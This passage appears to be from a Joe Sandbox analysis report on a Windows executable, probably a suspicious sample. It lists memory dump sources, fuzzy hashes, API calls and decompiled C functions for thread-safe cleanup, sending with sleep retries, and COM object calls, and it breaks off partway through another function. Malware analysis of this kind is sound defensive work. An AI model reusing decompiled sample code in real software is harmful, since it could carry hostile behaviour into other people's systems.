                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 92b9ff23b28bc40c6e9e710034151e6c318f4b9486cff39ba22ee0894646fa3f
                                                                                                                                                                                                                                                                                    • Instruction ID: 3e3dd8552cbe75fe5ae1c554dac2643b1da2c24a2dcdc53f0862cdb527b38f0e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92b9ff23b28bc40c6e9e710034151e6c318f4b9486cff39ba22ee0894646fa3f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B40162712443056FE730CE96DC88F9B77ACEBC8711F40882AF608D61C0C7B5A9469B79
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040E280(void* __esi) {
                                                                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                                                                    				intOrPtr _t19;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t21;
                                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t22 = __esi;
                                                                                                                                                                                                                                                                                    				_t23 =  *((intOrPtr*)(_t24 + 0xc));
                                                                                                                                                                                                                                                                                    				_t21 = _t23 + 0x244;
                                                                                                                                                                                                                                                                                    				EnterCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    				if(__esi == 0) {
                                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					if(InterlockedExchangeAdd(__esi + 0x14, 0) == 0) {
                                                                                                                                                                                                                                                                                    						_t13 =  *((intOrPtr*)(__esi + 0x38));
                                                                                                                                                                                                                                                                                    						_t19 =  *((intOrPtr*)(__esi + 0x34));
                                                                                                                                                                                                                                                                                    						if(_t13 != 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t13 + 0x34)) = _t19;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t19 == 0) {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t23 + 0x25c)) = _t13;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t19 + 0x38)) = _t13;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						E00408C70( *((intOrPtr*)(_t22 + 0x2c)));
                                                                                                                                                                                                                                                                                    						E00408C70(_t22);
                                                                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						LeaveCriticalSection(_t21);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x0040e280
                                                                                                                                                                                                                                                                                    0x0040e282
                                                                                                                                                                                                                                                                                    0x0040e287
                                                                                                                                                                                                                                                                                    0x0040e290
                                                                                                                                                                                                                                                                                    0x0040e298
                                                                                                                                                                                                                                                                                    0x0040e2e7
                                                                                                                                                                                                                                                                                    0x0040e2e8
                                                                                                                                                                                                                                                                                    0x0040e2f3
                                                                                                                                                                                                                                                                                    0x0040e29a
                                                                                                                                                                                                                                                                                    0x0040e2a8
                                                                                                                                                                                                                                                                                    0x0040e2b9
                                                                                                                                                                                                                                                                                    0x0040e2bc
                                                                                                                                                                                                                                                                                    0x0040e2c1
                                                                                                                                                                                                                                                                                    0x0040e2c3
                                                                                                                                                                                                                                                                                    0x0040e2c3
                                                                                                                                                                                                                                                                                    0x0040e2c8
                                                                                                                                                                                                                                                                                    0x0040e2cf
                                                                                                                                                                                                                                                                                    0x0040e2ca
                                                                                                                                                                                                                                                                                    0x0040e2ca
                                                                                                                                                                                                                                                                                    0x0040e2ca
                                                                                                                                                                                                                                                                                    0x0040e2d9
                                                                                                                                                                                                                                                                                    0x0040e2df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e2aa
                                                                                                                                                                                                                                                                                    0x0040e2ad
                                                                                                                                                                                                                                                                                    0x0040e2b8
                                                                                                                                                                                                                                                                                    0x0040e2b8
                                                                                                                                                                                                                                                                                    0x0040e2a8

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040E34C,?,?), ref: 0040E290
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040E2A0
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E34C,?,?), ref: 0040E2AD
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E34C,?,?), ref: 0040E2E8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e7775c6e724d18b6b16e4560ed2e445d19ec959f5a48ac8fdc33ada78c93d50a
                                                                                                                                                                                                                                                                                    • Instruction ID: e6ac6c1a31680b607f42abd4f6290106e839e9b4de79647b68f4cbd1092355c7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7775c6e724d18b6b16e4560ed2e445d19ec959f5a48ac8fdc33ada78c93d50a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4001DF35242204AFC3209F63ED44ADB73ACAB85B21B00483EE946A3681CB39E441CB38
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040BDD0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = _a4;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					while(_v12 <  *_v8) {
                                                                                                                                                                                                                                                                                    						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                                    						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                                                                                                                                                                                                                    						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					DeleteCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                                    					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                                    					E00408C70( *_t18);
                                                                                                                                                                                                                                                                                    					return E00408C70(_a4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t20;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x0040bdda
                                                                                                                                                                                                                                                                                    0x0040bddf
                                                                                                                                                                                                                                                                                    0x0040bde9
                                                                                                                                                                                                                                                                                    0x0040bdef
                                                                                                                                                                                                                                                                                    0x0040be01
                                                                                                                                                                                                                                                                                    0x0040be0e
                                                                                                                                                                                                                                                                                    0x0040be18
                                                                                                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                                                                                                    0x0040be27
                                                                                                                                                                                                                                                                                    0x0040be34
                                                                                                                                                                                                                                                                                    0x0040be3d
                                                                                                                                                                                                                                                                                    0x0040be41
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040be52
                                                                                                                                                                                                                                                                                    0x0040be58

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0040EC80), ref: 0040BDE9
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(0040EC84), ref: 0040BE18
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0040EC80), ref: 0040BE27
                                                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(0040EC80), ref: 0040BE34
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3102160386-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d585c410c8feea3006216bdaf8938572b99092e330cb370cdf972aaff2801c2a
                                                                                                                                                                                                                                                                                    • Instruction ID: b4a8df68a5ba6ddb4f07b24493b5635e0034f74153efd53aa39cf24915a517ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d585c410c8feea3006216bdaf8938572b99092e330cb370cdf972aaff2801c2a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF111E74900208EBDB04DF94D984A9DB7B5FF45309F2081A9E90667341DB35EE90DB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                    			E00405910(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				short _v36;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _t95;
                                                                                                                                                                                                                                                                                    				intOrPtr _t110;
                                                                                                                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                                                                                                                    				void* _t199;
                                                                                                                                                                                                                                                                                    				void* _t200;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t95 = E004058C0(0x4120d4, 0x4120e4);
                                                                                                                                                                                                                                                                                    					_t200 = _t199 + 8;
                                                                                                                                                                                                                                                                                    					_v28 = _t95;
                                                                                                                                                                                                                                                                                    					if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push( &_v32);
                                                                                                                                                                                                                                                                                    					_push(_v28);
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                                    						_push( &_v16);
                                                                                                                                                                                                                                                                                    						_push(_v32);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))() == 0) {
                                                                                                                                                                                                                                                                                    							_push( &_v36);
                                                                                                                                                                                                                                                                                    							_push(_v16);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                                    								if(_v36 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    									_push( &_v12);
                                                                                                                                                                                                                                                                                    									_push(_v16);
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                                                                                                                                                                                                                    										_push( &_v24);
                                                                                                                                                                                                                                                                                    										_push(_a4);
                                                                                                                                                                                                                                                                                    										_push(_v12);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                                                                                                                                                                                                                    											_t110 = E004058C0(0x4120f4, 0x412104);
                                                                                                                                                                                                                                                                                    											_t199 = _t200 + 8;
                                                                                                                                                                                                                                                                                    											_v24 = _t110;
                                                                                                                                                                                                                                                                                    											if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    												__imp__#2(L"Microsoft Corporation");
                                                                                                                                                                                                                                                                                    												_v8 = _t110;
                                                                                                                                                                                                                                                                                    												if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    													_push(_v8);
                                                                                                                                                                                                                                                                                    													_push(_v24);
                                                                                                                                                                                                                                                                                    													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                                                                                                                                                                                                                    														_push(_a4);
                                                                                                                                                                                                                                                                                    														_push(_v24);
                                                                                                                                                                                                                                                                                    														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                                                                                                                                                                                                                    															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    															if(_t118 == 0) {
                                                                                                                                                                                                                                                                                    																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                                                                                                                                                                                                                    																_t118 = 0;
                                                                                                                                                                                                                                                                                    																if(0 != 0) {
                                                                                                                                                                                                                                                                                    																	continue;
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																L34:
                                                                                                                                                                                                                                                                                    																if(_v20 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 = E00408C70(_v20);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    																	__imp__#6(_v8);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v32 != 0) {
                                                                                                                                                                                                                                                                                    																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    																if(_v28 == 0) {
                                                                                                                                                                                                                                                                                    																	return _t118;
                                                                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                                                                    																	return  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                                                                    															goto L34;
                                                                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                                                                    														goto L34;
                                                                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                                                                    													goto L34;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												goto L34;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L34;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                                                                                                                                                                                                                    										if(_t118 == 0) {
                                                                                                                                                                                                                                                                                    											if(_v36 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                                                                                                                                                                                                                    												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												_v40 = 0;
                                                                                                                                                                                                                                                                                    												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                                                                                                                                                                                                                    												if(_t118 == 0 && _v40 != 0) {
                                                                                                                                                                                                                                                                                    													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L34;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L34;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L34;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    0x00405916
                                                                                                                                                                                                                                                                                    0x0040591d
                                                                                                                                                                                                                                                                                    0x00405924
                                                                                                                                                                                                                                                                                    0x0040592b
                                                                                                                                                                                                                                                                                    0x00405932
                                                                                                                                                                                                                                                                                    0x00405939
                                                                                                                                                                                                                                                                                    0x00405940
                                                                                                                                                                                                                                                                                    0x00405947
                                                                                                                                                                                                                                                                                    0x00405951
                                                                                                                                                                                                                                                                                    0x00405956
                                                                                                                                                                                                                                                                                    0x00405959
                                                                                                                                                                                                                                                                                    0x00405960
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040596a
                                                                                                                                                                                                                                                                                    0x00405973
                                                                                                                                                                                                                                                                                    0x0040597b
                                                                                                                                                                                                                                                                                    0x00405985
                                                                                                                                                                                                                                                                                    0x0040598e
                                                                                                                                                                                                                                                                                    0x00405996
                                                                                                                                                                                                                                                                                    0x004059a0
                                                                                                                                                                                                                                                                                    0x004059a9
                                                                                                                                                                                                                                                                                    0x004059b1
                                                                                                                                                                                                                                                                                    0x004059bf
                                                                                                                                                                                                                                                                                    0x004059c9
                                                                                                                                                                                                                                                                                    0x004059d2
                                                                                                                                                                                                                                                                                    0x004059da
                                                                                                                                                                                                                                                                                    0x004059e4
                                                                                                                                                                                                                                                                                    0x004059e8
                                                                                                                                                                                                                                                                                    0x004059f1
                                                                                                                                                                                                                                                                                    0x004059f9
                                                                                                                                                                                                                                                                                    0x00405a83
                                                                                                                                                                                                                                                                                    0x00405a88
                                                                                                                                                                                                                                                                                    0x00405a8b
                                                                                                                                                                                                                                                                                    0x00405a92
                                                                                                                                                                                                                                                                                    0x00405a9b
                                                                                                                                                                                                                                                                                    0x00405aa1
                                                                                                                                                                                                                                                                                    0x00405aa8
                                                                                                                                                                                                                                                                                    0x00405aaf
                                                                                                                                                                                                                                                                                    0x00405ab8
                                                                                                                                                                                                                                                                                    0x00405ac0
                                                                                                                                                                                                                                                                                    0x00405ac7
                                                                                                                                                                                                                                                                                    0x00405ad0
                                                                                                                                                                                                                                                                                    0x00405ad8
                                                                                                                                                                                                                                                                                    0x00405aea
                                                                                                                                                                                                                                                                                    0x00405aee
                                                                                                                                                                                                                                                                                    0x00405b02
                                                                                                                                                                                                                                                                                    0x00405b04
                                                                                                                                                                                                                                                                                    0x00405b06
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405b0c
                                                                                                                                                                                                                                                                                    0x00405b10
                                                                                                                                                                                                                                                                                    0x00405b16
                                                                                                                                                                                                                                                                                    0x00405b1b
                                                                                                                                                                                                                                                                                    0x00405b22
                                                                                                                                                                                                                                                                                    0x00405b28
                                                                                                                                                                                                                                                                                    0x00405b28
                                                                                                                                                                                                                                                                                    0x00405b32
                                                                                                                                                                                                                                                                                    0x00405b40
                                                                                                                                                                                                                                                                                    0x00405b40
                                                                                                                                                                                                                                                                                    0x00405b46
                                                                                                                                                                                                                                                                                    0x00405b54
                                                                                                                                                                                                                                                                                    0x00405b54
                                                                                                                                                                                                                                                                                    0x00405b5a
                                                                                                                                                                                                                                                                                    0x00405b68
                                                                                                                                                                                                                                                                                    0x00405b68
                                                                                                                                                                                                                                                                                    0x00405b6e
                                                                                                                                                                                                                                                                                    0x00405b7c
                                                                                                                                                                                                                                                                                    0x00405b7c
                                                                                                                                                                                                                                                                                    0x00405b82
                                                                                                                                                                                                                                                                                    0x00405b95
                                                                                                                                                                                                                                                                                    0x00405b84
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405b90
                                                                                                                                                                                                                                                                                    0x00405b82
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405af0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405ada
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405ac2
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405aaa
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405a94
                                                                                                                                                                                                                                                                                    0x00405a0b
                                                                                                                                                                                                                                                                                    0x00405a0f
                                                                                                                                                                                                                                                                                    0x00405a1d
                                                                                                                                                                                                                                                                                    0x00405a62
                                                                                                                                                                                                                                                                                    0x00405a72
                                                                                                                                                                                                                                                                                    0x00405a1f
                                                                                                                                                                                                                                                                                    0x00405a1f
                                                                                                                                                                                                                                                                                    0x00405a36
                                                                                                                                                                                                                                                                                    0x00405a3a
                                                                                                                                                                                                                                                                                    0x00405a50
                                                                                                                                                                                                                                                                                    0x00405a50
                                                                                                                                                                                                                                                                                    0x00405a52
                                                                                                                                                                                                                                                                                    0x00405a74
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405a0f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059dc
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059c1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004059b3
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405998
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040597d
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004058C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004058E0
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00405B28
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                                                                                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                                                                                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                                                                                                                                                                                    • Opcode ID: 5101201dcff8a4348e4f4b8b21c8e9287c00567db6cdf25e3dc099c263020228
                                                                                                                                                                                                                                                                                    • Instruction ID: b966d8a815279bea9682a753b9e4a3ce538f0dcc0c86578e863b9189ac0295eb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5101201dcff8a4348e4f4b8b21c8e9287c00567db6cdf25e3dc099c263020228
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1691BA75A0050ADFCB04DB98C994EAFB7B5EF88304F208269E515B73A0D778AE41CF65
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                    			E0040CC30(char* _a4) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                                                                    				intOrPtr _t62;
